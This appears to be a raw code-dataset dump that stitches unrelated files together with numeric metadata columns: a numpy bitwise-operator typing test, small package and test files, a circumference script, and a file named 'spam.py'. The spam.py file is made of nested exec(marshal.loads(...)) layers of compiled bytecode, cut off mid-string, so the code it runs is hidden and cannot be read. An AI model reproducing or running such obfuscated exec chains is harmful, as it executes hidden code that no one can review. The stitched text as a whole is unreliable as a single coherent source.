| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6883532f2502f82dccd35fe030c5e8e82af300c0
| 6,378
|
py
|
Python
|
numpy/typing/tests/data/reveal/bitwise_ops.py
|
mbkumar/numpy
|
0645461254a2110438b6df63ef193c1138c306ec
|
[
"BSD-3-Clause"
] | 3
|
2021-02-06T06:47:30.000Z
|
2021-08-11T10:05:27.000Z
|
numpy/typing/tests/data/reveal/bitwise_ops.py
|
RuSHi2381/numpy
|
5da4a8e1835a11d5a03b715e9c0afe3bb96c883b
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/typing/tests/data/reveal/bitwise_ops.py
|
RuSHi2381/numpy
|
5da4a8e1835a11d5a03b715e9c0afe3bb96c883b
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
i8 = np.int64(1)
u8 = np.uint64(1)
i4 = np.int32(1)
u4 = np.uint32(1)
b_ = np.bool_(1)
b = bool(1)
i = int(1)
AR = np.array([0, 1, 2], dtype=np.int32)
AR.setflags(write=False)
reveal_type(i8 << i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 >> i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 | i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 ^ i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 & i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 << AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(i8 >> AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(i8 | AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(i8 ^ AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(i8 & AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(i4 << i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 >> i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 | i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 ^ i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 & i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i8 << i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 >> i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 | i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 ^ i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 & i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 << i) # E: numpy.signedinteger[Any]
reveal_type(i8 >> i) # E: numpy.signedinteger[Any]
reveal_type(i8 | i) # E: numpy.signedinteger[Any]
reveal_type(i8 ^ i) # E: numpy.signedinteger[Any]
reveal_type(i8 & i) # E: numpy.signedinteger[Any]
reveal_type(i8 << b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 >> b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 | b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 ^ b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 & b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 << b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 >> b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 | b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 ^ b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 & b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(u8 << u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 >> u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 | u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 ^ u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 & u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 << AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(u8 >> AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(u8 | AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(u8 ^ AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(u8 & AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(u4 << u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 >> u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 | u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 ^ u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 & u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 << i4) # E: numpy.signedinteger[Any]
reveal_type(u4 >> i4) # E: numpy.signedinteger[Any]
reveal_type(u4 | i4) # E: numpy.signedinteger[Any]
reveal_type(u4 ^ i4) # E: numpy.signedinteger[Any]
reveal_type(u4 & i4) # E: numpy.signedinteger[Any]
reveal_type(u4 << i) # E: numpy.signedinteger[Any]
reveal_type(u4 >> i) # E: numpy.signedinteger[Any]
reveal_type(u4 | i) # E: numpy.signedinteger[Any]
reveal_type(u4 ^ i) # E: numpy.signedinteger[Any]
reveal_type(u4 & i) # E: numpy.signedinteger[Any]
reveal_type(u8 << b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 >> b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 | b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 ^ b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 & b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 << b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 >> b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 | b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 ^ b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 & b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(b_ << b_) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ >> b_) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ | b_) # E: numpy.bool_
reveal_type(b_ ^ b_) # E: numpy.bool_
reveal_type(b_ & b_) # E: numpy.bool_
reveal_type(b_ << AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(b_ >> AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(b_ | AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(b_ ^ AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(b_ & AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(b_ << b) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ >> b) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ | b) # E: numpy.bool_
reveal_type(b_ ^ b) # E: numpy.bool_
reveal_type(b_ & b) # E: numpy.bool_
reveal_type(b_ << i) # E: numpy.signedinteger[Any]
reveal_type(b_ >> i) # E: numpy.signedinteger[Any]
reveal_type(b_ | i) # E: numpy.signedinteger[Any]
reveal_type(b_ ^ i) # E: numpy.signedinteger[Any]
reveal_type(b_ & i) # E: numpy.signedinteger[Any]
reveal_type(~i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(~i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(~u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(~u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(~b_) # E: numpy.bool_
reveal_type(~AR) # E: Union[numpy.ndarray*, numpy.integer[Any], numpy.bool_]
| 48.318182
| 80
| 0.723267
| 972
| 6,378
| 4.536008
| 0.039095
| 0.217736
| 0.219778
| 0.184622
| 0.972783
| 0.972783
| 0.96802
| 0.96802
| 0.96802
| 0.924473
| 0
| 0.040816
| 0.116494
| 6,378
| 131
| 81
| 48.687023
| 0.741615
| 0.60693
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009434
| 0
| 0.009434
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d7cd5b7630f21eeec396dd9a8f6481d512fe4a0b
| 170
|
py
|
Python
|
treestream/backends/redis_lua/__init__.py
|
GambitResearch/treestream
|
5d08162fb095c4e34e7a80f2015946bb65b8021c
|
[
"MIT"
] | null | null | null |
treestream/backends/redis_lua/__init__.py
|
GambitResearch/treestream
|
5d08162fb095c4e34e7a80f2015946bb65b8021c
|
[
"MIT"
] | null | null | null |
treestream/backends/redis_lua/__init__.py
|
GambitResearch/treestream
|
5d08162fb095c4e34e7a80f2015946bb65b8021c
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from treestream.backends.redis_lua.writer import RedisTreeWriter
from treestream.backends.redis_lua.reader import RedisTreeReader
| 34
| 64
| 0.888235
| 21
| 170
| 6.857143
| 0.571429
| 0.194444
| 0.305556
| 0.375
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076471
| 170
| 4
| 65
| 42.5
| 0.917197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d7df6482015db9d1d6befb5e53db80fc1ee99994
| 49
|
py
|
Python
|
tests/test_app.py
|
sqrl-planner/sqrl-server
|
815b0b9ff8943faa806876aa9946ccc8314585ce
|
[
"MIT"
] | null | null | null |
tests/test_app.py
|
sqrl-planner/sqrl-server
|
815b0b9ff8943faa806876aa9946ccc8314585ce
|
[
"MIT"
] | null | null | null |
tests/test_app.py
|
sqrl-planner/sqrl-server
|
815b0b9ff8943faa806876aa9946ccc8314585ce
|
[
"MIT"
] | null | null | null |
import pytest
def test_true():
assert True
| 8.166667
| 16
| 0.693878
| 7
| 49
| 4.714286
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.244898
| 49
| 5
| 17
| 9.8
| 0.891892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0bc7c8d9ffa261e332bed2889d39e370b8fd409d
| 146
|
py
|
Python
|
test.py
|
gzheng29/Casimir-programming
|
06927d8a31967e3fd1c842dd5350a79bfa496671
|
[
"MIT"
] | null | null | null |
test.py
|
gzheng29/Casimir-programming
|
06927d8a31967e3fd1c842dd5350a79bfa496671
|
[
"MIT"
] | null | null | null |
test.py
|
gzheng29/Casimir-programming
|
06927d8a31967e3fd1c842dd5350a79bfa496671
|
[
"MIT"
] | null | null | null |
print('hello world')
import numpy as np
def circumference(radius):
return 2*np.pi*radius
def surface(radius):
return np.pi*radius**2
| 14.6
| 27
| 0.69863
| 23
| 146
| 4.434783
| 0.608696
| 0.235294
| 0.196078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016807
| 0.184932
| 146
| 9
| 28
| 16.222222
| 0.840336
| 0
| 0
| 0
| 0
| 0
| 0.075342
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.333333
| 0.833333
| 0.166667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
0451770c08269d79ae2228c65b04e05d0ef0ec98
| 167
|
py
|
Python
|
pythran/tests/user_defined_import/builtins_in_imported_main.py
|
davidbrochart/pythran
|
24b6c8650fe99791a4091cbdc2c24686e86aa67c
|
[
"BSD-3-Clause"
] | 1,647
|
2015-01-13T01:45:38.000Z
|
2022-03-28T01:23:41.000Z
|
pythran/tests/user_defined_import/builtins_in_imported_main.py
|
davidbrochart/pythran
|
24b6c8650fe99791a4091cbdc2c24686e86aa67c
|
[
"BSD-3-Clause"
] | 1,116
|
2015-01-01T09:52:05.000Z
|
2022-03-18T21:06:40.000Z
|
pythran/tests/user_defined_import/builtins_in_imported_main.py
|
davidbrochart/pythran
|
24b6c8650fe99791a4091cbdc2c24686e86aa67c
|
[
"BSD-3-Clause"
] | 180
|
2015-02-12T02:47:28.000Z
|
2022-03-14T10:28:18.000Z
|
import builtins_in_imported
from builtins_in_imported import dint
#pythran export entry()
#runas entry()
def entry():
return dint(), builtins_in_imported.dint()
| 18.555556
| 46
| 0.778443
| 23
| 167
| 5.391304
| 0.521739
| 0.241935
| 0.435484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131737
| 167
| 8
| 47
| 20.875
| 0.855172
| 0.209581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.75
| 0.25
| 1.25
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
f0fcd0c51d95734bd9caa3889e2ca095d3c104b8
| 195,519
|
py
|
Python
|
spam.py
|
reyza98/spon
|
977cf1f46ca2f06977e8fcf6d48b9b5adfca68e0
|
[
"BSD-3-Clause"
] | 39
|
2020-02-26T09:44:36.000Z
|
2022-03-23T00:18:25.000Z
|
Vvvip7/spam.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 15
|
2020-05-14T10:07:26.000Z
|
2022-01-06T02:55:32.000Z
|
Vvvip7/spam.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 41
|
2020-03-16T22:36:38.000Z
|
2022-03-17T14:47:19.000Z
|
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x1b\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x1a\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x1a\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x19\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x19\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x18\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x18\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x17\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x17\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x16\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x16\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x15\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x15\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x14\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x14\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x13\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x13\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x12\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x12\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x11\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x11\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x10\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x10\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x0f\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x0f\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x0e\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x0e\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\r\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\r\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x0c\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x0c\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\x0b\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\x0b\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\n\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\n\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x97\t\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d\x01l\x00Z\x00e\x01e\x00\xa0\x02d\x02\xa1\x01\x83\x01\x01\x00d\x01S\x00)\x03\xe9\x00\x00\x00\x00Ns\x17\t\x01\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x1a\x00\x00\x00d\x00d